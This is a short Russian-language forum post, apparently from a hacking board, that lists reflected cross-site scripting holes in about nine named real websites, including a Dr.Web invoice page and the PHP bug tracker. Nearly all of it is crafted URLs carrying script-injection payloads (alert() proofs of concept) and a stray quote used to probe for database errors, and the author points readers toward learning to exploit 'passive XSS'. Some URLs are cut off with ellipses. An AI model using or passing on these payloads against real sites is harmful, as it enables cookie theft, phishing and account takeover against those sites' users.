вот бага
http://www.mix.az/engine/modules/imagepreview.php?image=');</script><script>alert()</script>
а как воспользоваться ,ищи в поиске "пассивные xss"
здесь описывать не буду, много, ды это прочитай а что непонятное спрашивай.
ОБНОВЛЕНИЕ
http://www.drweb.ru/buy/invoice/?computers=&period=1y&email=%22%3E%3Cscript%3Ealer t%281%29%3C%2Fscript%3E&phone=%22%3E%3Cscript%3Eal ert%282%29%3C%2Fscript%3E&j_address=%22%3E%3Cscrip t%3Ealert%283%29%3C%2Fscript%3E&m_address=%22%3E%3 Cscript%3Ealert%284%29%3C%2Fscript%3E&org=%22%3E%3 Cscript%3Ealert%285%29%3C%2Fscript%3E&kpp=%22%3E%3 Cscript%3Ealert(6)</script>&currency=RUR&act=finish&prodid=01-D
http://www.multitran.ru/c/m.exe?HL=2...3C%2Fscript%3E
http://bugs.php.net/report.php?in%5B...n%5Bactres%5D=
http://www.cafepress.com/cp/search/s...cfpt=&x=26&y=8
http://www.phpbbhacks.com/searchresults.php?version=2"><script>alert()</script>&query=666&search_type=1&Submit=Go
http://www.tstyle.ru/price/1001636'
http://xrout.org/index.php поиск "><script>alert()</script>
http://www.etegro.com/rus/?module=items&id=22'"&text=1"><script>alert()</script>